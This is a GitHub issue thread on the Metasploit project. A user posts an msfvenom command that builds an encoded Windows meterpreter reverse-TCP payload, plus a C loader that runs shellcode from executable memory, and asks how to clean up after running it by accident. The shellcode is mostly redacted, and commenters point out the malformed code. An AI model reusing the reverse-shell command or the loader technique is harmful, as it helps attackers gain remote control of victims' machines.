### ISSUE TITLE
question about runned payload

### ISSUE THREAD

**Issue by azamet90** [rapid7/metasploit-framework#13729]
for trying the tool i created a payload on visual studio for metasploit with that command
msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxxxxx LPORT=xxxxx -e x86/shikata_ga_nai -i 8 [34/34]
open_command     opener           openpgp-tool     opensc-explorer  opensc-tool      openvpn                                            │shell.c                                                                                                                               
```
#include <stdio.h>
#include <windows.h>

unsigned const char payload[] = "\xdd\xc7\xbb\xdd\xf4\x34\x54\xd9\x74\x24\xf4\x5f\x31\xc9\xb1"
"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";

size_t size = 2236;

int main(int argc, char** argv) {

    char* code;

    printf("azametin imzasi\n");

    code = (char*)VirtualAlloc(NULL, size MEM_COMMIT,PAGE_EXECUTE_READWRITE);

    memcpy(code, payload,size);

    ((void(*)())code)();

    return(0);}


```

but accidently i run it so which files i need to remove for cleaning the payload?

**Comment by harmjay** [comment]
This payload is only on memory, reboot computer :)

**Comment by bcoles** [comment]
> but accidently i run it so which files i need to remove for cleaning the payload?

Why is there a `[34/34]` at the end of your `msfvenom` command?

Why is your C code malformed?

Why are you piping a bunch of programs to a `.c` file ?

I have no idea what you're asking, but as the author of the code I'm fairly certain that you are in a better position to answer your question than anyone else. Closing this issue.
